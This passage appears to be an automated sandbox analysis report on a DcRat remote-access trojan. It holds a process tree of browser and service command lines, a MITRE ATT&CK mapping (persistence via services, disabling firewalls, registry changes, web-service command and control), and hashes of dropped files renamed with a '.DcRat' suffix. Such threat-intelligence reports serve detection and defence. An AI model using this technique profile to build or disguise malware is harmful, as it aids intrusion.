      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=22036 -childID 94 -isForBrowser -prefsHandle 21956 -prefMapHandle 21960 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1c2621b-1079-41b0-b298-12b59be8ab61} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:3872
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=22152 -childID 95 -isForBrowser -prefsHandle 22232 -prefMapHandle 22228 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cbdab0d8-348a-4701-a96d-9a16bfb04e09} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:2580
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=21744 -childID 96 -isForBrowser -prefsHandle 22388 -prefMapHandle 22392 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f46e7c09-8316-43d5-bcd6-156ace58ac03} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:6852
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=22636 -childID 97 -isForBrowser -prefsHandle 22556 -prefMapHandle 22560 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8a7568ad-0855-45d4-8ea7-e87f27009395} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:6584
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=22740 -childID 98 -isForBrowser -prefsHandle 22748 -prefMapHandle 22752 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b308d0af-5e08-490e-b810-f35b5515ad85} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:4552
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=22964 -childID 99 -isForBrowser -prefsHandle 23044 -prefMapHandle 23040 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {798677fb-8ed7-4d55-9f79-a9b9497e8cb1} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:6316
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=23156 -childID 100 -isForBrowser -prefsHandle 23236 -prefMapHandle 23232 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {457dc489-e80b-4f93-8ee2-4da52f4868c2} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:6468
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=23444 -childID 101 -isForBrowser -prefsHandle 23364 -prefMapHandle 23368 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8fec8311-a784-4c15-bc53-4a2742d00c2f} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" tab
      4⤵
      PID:6388
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" -nohome
  2⤵
  PID:11428
- C:\Program Files\VideoLAN\VLC\vlc.exe
  "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Downloads\PingGroup.mov"
  2⤵
  PID:7160
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Downloads\FormatSkip.mht
  2⤵
  PID:12012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  PID:1840
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xdc,0x100,0x104,0x3c,0x108,0x7ff95e20cc40,0x7ff95e20cc4c,0x7ff95e20cc58
    3⤵
    PID:6176
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1948,i,14874733843015852404,6376835469341335895,262144 --variations-seed-version=20240507-050127.537000 --mojo-platform-channel-handle=1944 /prefetch:2
    3⤵
    PID:11380
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1752,i,14874733843015852404,6376835469341335895,262144 --variations-seed-version=20240507-050127.537000 --mojo-platform-channel-handle=2004 /prefetch:3
    3⤵
    PID:11392
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2212,i,14874733843015852404,6376835469341335895,262144 --variations-seed-version=20240507-050127.537000 --mojo-platform-channel-handle=2224 /prefetch:8
    3⤵
    PID:4576
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,14874733843015852404,6376835469341335895,262144 --variations-seed-version=20240507-050127.537000 --mojo-platform-channel-handle=3244 /prefetch:1
    3⤵
    PID:7836
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,14874733843015852404,6376835469341335895,262144 --variations-seed-version=20240507-050127.537000 --mojo-platform-channel-handle=3380 /prefetch:1
    3⤵
    PID:8336
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4328,i,14874733843015852404,6376835469341335895,262144 --variations-seed-version=20240507-050127.537000 --mojo-platform-channel-handle=4408 /prefetch:1
    3⤵
    PID:7176
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4560,i,14874733843015852404,6376835469341335895,262144 --variations-seed-version=20240507-050127.537000 --mojo-platform-channel-handle=4420 /prefetch:8
    3⤵
    PID:10160
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4464,i,14874733843015852404,6376835469341335895,262144 --variations-seed-version=20240507-050127.537000 --mojo-platform-channel-handle=4720 /prefetch:8
    3⤵
    PID:4336
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3588,i,14874733843015852404,6376835469341335895,262144 --variations-seed-version=20240507-050127.537000 --mojo-platform-channel-handle=4928 /prefetch:8
    3⤵
    PID:9076
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4552,i,14874733843015852404,6376835469341335895,262144 --variations-seed-version=20240507-050127.537000 --mojo-platform-channel-handle=5028 /prefetch:8
    3⤵
    PID:4208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Downloads\GetConvertTo.xhtml
  2⤵
  PID:5952
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff945043cb8,0x7ff945043cc8,0x7ff945043cd8
    3⤵
    PID:10644
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,6783187229682787230,2238833457839077465,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1928 /prefetch:2
    3⤵
    PID:8896
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,6783187229682787230,2238833457839077465,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
    3⤵
    PID:10040
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,6783187229682787230,2238833457839077465,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2540 /prefetch:8
    3⤵
    PID:11540
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,6783187229682787230,2238833457839077465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:1
    3⤵
    PID:9000
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,6783187229682787230,2238833457839077465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3152 /prefetch:1
    3⤵
    PID:5024
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,6783187229682787230,2238833457839077465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1
    3⤵
    PID:5212
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,6783187229682787230,2238833457839077465,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4640 /prefetch:1
    3⤵
    PID:6928
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,6783187229682787230,2238833457839077465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1
    3⤵
    PID:692
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,6783187229682787230,2238833457839077465,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1
    3⤵
    PID:444
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,6783187229682787230,2238833457839077465,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8
    3⤵
    PID:5960
- - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1904,6783187229682787230,2238833457839077465,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5440 /prefetch:8
    3⤵
    PID:9128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:4028

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:464

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:1908

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:3920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4968

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:2300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:2108

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:6640

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:2032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
1⤵
PID:5984

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:11896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:11156

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:3456

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\Microsoft.DiaSymReader.Native.amd64.dll.DcRat

Filesize
1.8MB

MD5
8310d99d46207f211d2b9af83f1a707a

SHA1
5b292472099058ce1250feb74fedb4638f525312

SHA256
85e2f4ce890ebd85d5b55da8b4310f88a8a52e115ee69f697f2fb474cafe6b2d

SHA512
44e8b73fff4d75ceaeab35e2a417b607c447e7002ddc57bf5bcf36c309da355f0f42bc8fc46fd088152ad1f18033a779dce909003b6ab6cecfdedda90b53557b

Download Submit
C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\mscordaccore.dll.DcRat

Filesize
1.3MB

MD5
4b6bc864909a5cb6152c281c4748daf5

SHA1
53bf3a7f2eafbfc59527c1bdd5e2fef7a6b02c9f

SHA256
508e9e40db4ecf80bbcc278259ca63e711f46c1069f6eca367aa6f23067fc7d3

SHA512
3cc8492859cd44b59c8afe555193c61c3926a4da8563485d3c8b492da82cf7efb4b962c67c768f5d6f074b4ae901d044d6f92539713ec08a9a58f829fde45d73

Download Submit
C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\mscordaccore.dll.DcRat

Filesize
1.3MB

MD5
42affb2ad5c5a21b2cfff0016a5cbc0c

SHA1
5b017b0756c39005f97c4589fea106fc1a738a46

SHA256
b0a2bf944954119c6214913700dc991ad5a2fc35cd430eacc71a2c344435705c

SHA512
e610aa36cffc69ce6b6cb619e0dbf6d42579208328739471d6b1c3efc7cecd5f160ab9dac7df5592b387cf695c57c79b499c5eb2951e2f5c375543515b528426

Download Submit
C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\msquic.dll.DcRat

Filesize
476KB

MD5
68fe6acc9b5d7508607f82a4864c385f

SHA1
cbd1eed8d62103f16463b96010f6d741e2e2ddd2

SHA256
74e3c9f591ce7eada1054a2bf151c81137e1bd2490c11387295cdcc3244b67c7

SHA512
d9772428fbd4264784155cb8c4e9f448ea1913edf583c4c95dd50002ff75b371b023bcccfbea4748ec774cd89000e02c4b0a2705d5b772527868bc8b26f0e92f

Download Submit
C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\D3DCompiler_47_cor3.dll

Filesize
4.7MB

MD5
2cf6b9d0f1e79b207a723f7bd41c2406

SHA1
d00a667b62614a17ae1483ff1a035215d55d3a30

SHA256
6220f887f48b04dedeab3e5995c3f086071ef92456235e85863d45ce54eef880

SHA512
9e27a09dce517d0ce2c712aabdebdb43adad2283062759e7f33666f1fab855089d519dd8489d61a49c536a026f82bf3992fc5dc5ff0abaa86810f00aba752180

Download Submit
C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\vcruntime140_cor3.dll

Filesize
116KB

MD5
6a983d5086416ed05cfdc3b0812890e0

SHA1
aecc43c51073c743b94b11517f5abb4afb7dc85b

SHA256
3d4e2da373a20688a30c64c532c586a20ad29a33076b3575a69177907396af75

SHA512
27edad7dcabfe45a3431890eab165dbf093427dd29bcd465741bc574d3d0f30e07cc96a82e5599a67130ab401861b37767119c5a8fd305e87df73681e39393d2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Filesize
338B

MD5
7296239169410cd86546f1d80dd1a217

SHA1
4231688b34b10bfd8fad7f2f7f65a975fa5364a8

SHA256
d6e4f0aceb8826e244eca35656f6996ae8f8eaff07e51af675fd48394512404f

SHA512
2094bfa56589a49392e1977d94cba98ae9a58d6136e32a0ed81eb93e57a0774a1b88bbb721f90061300ab46cb5d73be438df4aa45a184693dda1cfc995f7a296

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Filesize
330B

MD5
99241327393b834f39c4948997586130

SHA1
e27ae23c4acd1be184702743f0279c85c01dd5fe

SHA256
4f306a75e6ee67f8ee8d407e081934caf80a9f9acdf469a00ab3b2b5d534af00

SHA512
e7781f9165c2a918ad320429711e891ec523f55207a26069550563b0412c07a5dd51c1c9c0ad4280f75c26913cda55506583b9f0d4627403b36e9808dff7252d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

Filesize
330B

MD5
385f36fc0c820f4b65715ecf5a54c5c0

SHA1
7e5fec059c92eb059c7fdbcc087643b3beee8079

SHA256
12dbd6577fa5963b931c2e0257e06285374216b80d9f383fccaba933b7f4b9bf

SHA512
17ddb615bfb5802d1b36fbdeb84a62844ce066192f826bea2f3a8e48d1e2fc23bd5a3fef17e3e07da787bb8f730924bf0d7ce8135edf8533c26f0910b2b352f0

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
1008B

MD5
d222b77a61527f2c177b0869e7babc24

SHA1
3f23acb984307a4aeba41ebbb70439c97ad1f268

SHA256
80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

SHA512
d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
65cd1c746d8b1bcd3be2621a5334cd6f

SHA1
73d8b48ef0092ec115fb9fca9d035d022e435d01

SHA256
95a8ea148551e9e9b8ea4298c395e18639120417e431339fcd4af6944aa345f2

SHA512
1dc9a03ca428ed9fc21d56caaf64ebb9d6907ad167e36074b4f84739679da2854d48ae77ff45690b961f5de52534e76e9d325c62c0ea8bbf27b9ea21fbbbb105

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
21435306d704add6a6a6194921c2da04

SHA1
b87482b930e568d82a419ae636b3239baa06e653

SHA256
099655d5b3b4dc877b9f868969e138f5a1ef65c2ee8c03d62c6efbe455ba135e

SHA512
46828c74ec6bbd77823ee79a1572f7204b6be96a61371db8ca449b6475d27323c987e7ddaad256031d4dcaaa6c5e26fde0807551cddc29723793035024801d3a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002e

Filesize
1024KB

MD5
4322f0449af173fb3994d2bef7ecb2e4

SHA1
b6ee5c6f76b8eee448f6b4b2b56fa1ec39653934

SHA256
0502e6e2f3fc54a30dea0eb07eb19a395c7ea6fc273321a49a4cc977a59b7cc9

SHA512
d8bae6131a5a8a1fcabb2d7efebc6cdbba27955fb77484a5d87dbce7a237c0cd5e19b74b4dad28312929ad732d3b80cf3d7f15f059c88438d0bc6ff9535ceeef

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00003f

Filesize
250KB

MD5
29b1adf527657e404731bcb7271b79f8

SHA1
50aae42abf35013822edd2004b109c1dca12e96b

SHA256
4fbab2df29d82f1d5d1ab88a4cd42dfbfd777934ed5b177324542239df37bcc8

SHA512
17d123f7b9e62a158ab2589750da30e0d8290f910052d0d464a7f5a40d4e5011c8c33ee4804000fbc52f1c4e27b8d04cf7fd1bf13a9a9b07ac2376fad1e6ed56

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
336B

MD5
6dab20fa571b73ea9e0224c2ecb2434f

SHA1
eefbf4fa7144549b1dd11f99dc630138a238078f

SHA256
6cbc63f51bfa093e4203963c4c4e40585feae190e02964a580360901b0ca1d54

SHA512
3ed498218062dc4eec940334639668e051bc75c10e85477466b6ee522bf2efbd51fa63ecedd1409ab0655a50638ede7cf699c1ea095348ff1849249a2c98a806

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
64c6f4c66c5ddf26ecda4ea647e95f38

SHA1
2484ae94f3f82d3e55a4eb25faf17ec799310308

SHA256
c9237a916f7b9787a16d169cfb46e479ee7352abc89947f1d4ef9af618cdf49b

SHA512
fe49bece83ef12dd41c0c14717680675af2bc2db87921d087461bd84c05e551d2ac9025e8b265500519519a66237926a3fac9929a2667e8354be4c360c7abd6e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
58622182b67fe61767f7f67996829172

SHA1
caac822857d7633e053d59da8d64b050cefb2bc9

SHA256
45243dec148262b28446bb8beb6235f02ba58c8c9c0e55083109eebf0fff8ea4

SHA512
2eced6bc61dd92ae4cddf3d1497acd18bbff9efbf35c49b746ff0f28ee8c07d8f35634b955c49ea699770a5526683b803e25826d878f420402d40d509eb00cf6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
312B

MD5
2fff9beed5b607de9ace65792e8dfeb1

SHA1
c798c3bae709000bb9359b08c6ff762b545c39f9

SHA256
